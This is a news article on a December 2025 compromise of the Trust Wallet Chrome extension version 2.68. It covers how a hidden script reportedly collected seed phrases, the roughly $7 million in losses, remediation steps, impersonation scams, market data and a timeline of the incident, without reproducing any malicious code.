Trust Wallet Chrome Extension: Hidden Script Collects Private Keys, Causing Losses of Up to $7 Million

Serious Security Incident: Version 2.68 Exposes User Seed Phrases

On December 24-25, 2025, Trust Wallet issued an urgent warning urging Chrome users to stop using version 2.68 of the extension. The company discovered a security vulnerability in the code execution process, which allowed seed phrases and private keys of users to be collected unlawfully. Initial reports indicate total damages of approximately $6-7 million across multiple blockchains within the first 48-72 hours.

The Trust Wallet extension on the Chrome Web Store currently has about 1 million users installed. The actual impact depends on how many users have updated to version 2.68 and entered sensitive information during the vulnerability window. Trust Wallet confirms that mobile versions and other platforms are unaffected.

Attack Mechanism: Malicious JavaScript Code Collects Wallet Secrets

Security researchers identified suspicious logic within the 2.68 installation package. Specifically, in a JavaScript file referencing “4482.js,” analysts found that this code could transmit seed phrases and private keys to an external server.

A seed phrase is a sequence of words capable of unlocking all current and future addresses generated from it. This means that if the seed phrase is compromised, the entire wallet and assets across different chains are at risk of being drained. The investigation team identified the highest risk for users who entered or restored seed phrases after installing the faulty version.

Necessary Action: Updating Is Not Enough, Assets Must Be Transferred

Updating to version 2.69 can remove malicious code from the extension in the future, but this does not automatically protect assets if the seed phrase was compromised earlier.

If you entered or restored your seed phrase while using version 2.68, consider that seed compromised. Standard remediation steps include:

• Creating a completely new seed phrase
• Transferring all assets to a wallet generated from the new seed phrase
• Revoking token approvals (token approvals) on smart contracts if possible

These actions may incur costs due to cross-chain asset transfers. Users should weigh speed against gas fees, especially when dealing with cross-chain bridge transactions.

“Rescue” Scams Are Increasing

At the same time as the incident, secondary scam tactics have begun to emerge. Scammers create fake “recovery” domains to trick users into revealing seed phrases under the guise of “wallet recovery support.”

Trust Wallet advises users not to interact with any messages not from official channels. Attackers may impersonate Trust Wallet support to target victims. Always verify the source of any seed phrase-related requests.

Broader Issue: Extensions as a Security Weak Point for Wallets

This incident highlights a fundamental risk of browser extensions. They occupy a sensitive position between web applications and transaction signing processes, allowing them to interfere with information users rely on to verify transactions.

Academic research on the Chrome Web Store shows that malicious or compromised extensions can evade automated moderation. As attack strategies evolve over time, detection capabilities diminish. This is especially concerning for wallet updates where client-side code is complex—making analysis more difficult.

Precedent: Software Distribution Process Integrity

The incident also raises questions about the integrity of software build and distribution processes. Long-term solutions may include:

• Building (reproducible builds)
• Key separation (key separation)
• Clearer rollback procedures

These measures will help providers and platforms develop better verification methods and user guidance.

Market Data: Investors Still “Waiting and Watching”

Despite the serious incident, the TWT (Trust Wallet Token) market reflects mixed signals. As of January 12, 2026:

• Current Price: $0.89
• 24h Change: +0.13%
• 24h High: $0.90
• 24h Low: $0.86

This volatility indicates that investors have not yet fully priced the token in a single direction. Optimism may stem from Trust Wallet’s refund commitments or confidence in resolving the incident.

Damage Forecast: From $6-12 Million to $25 Million+ in 2-8 Weeks

Potential reasons for continued damage increase include:

• Late victim reports
• Reclassification of addresses
• Improved tracking of cross-chain swap transactions

A realistic forecast range over the next 2-8 weeks can be divided into scenarios:

This depends on whether the collection method is limited to seed input on v2.68, whether additional attack vectors exist, and the speed of domain takedowns.

Timeline of the Incident

• December 24: Version 2.68 deployed; reports of withdrawals begin
• December 25: Trust Wallet releases version 2.69 with patches
• First 48-72 hours: Total damages estimated at around $6-7 million

Final Recommendations from Trust Wallet

The company has now confirmed approximately $7 million affected and commits to refund all impacted users. Trust Wallet’s guidance:

1. Immediately disable version 2.68 extension from Chrome
2. Update to version 2.69 from Chrome Web Store
3. If you entered seed phrase on 2.68: consider it compromised, generate a new seed, and transfer assets
4. Do not interact with unofficial messages—scammers may impersonate support
5. Wait for official refund instructions from authorized channels

This incident serves as a reminder that, despite the convenience of extensions, users must carefully consider associated security risks.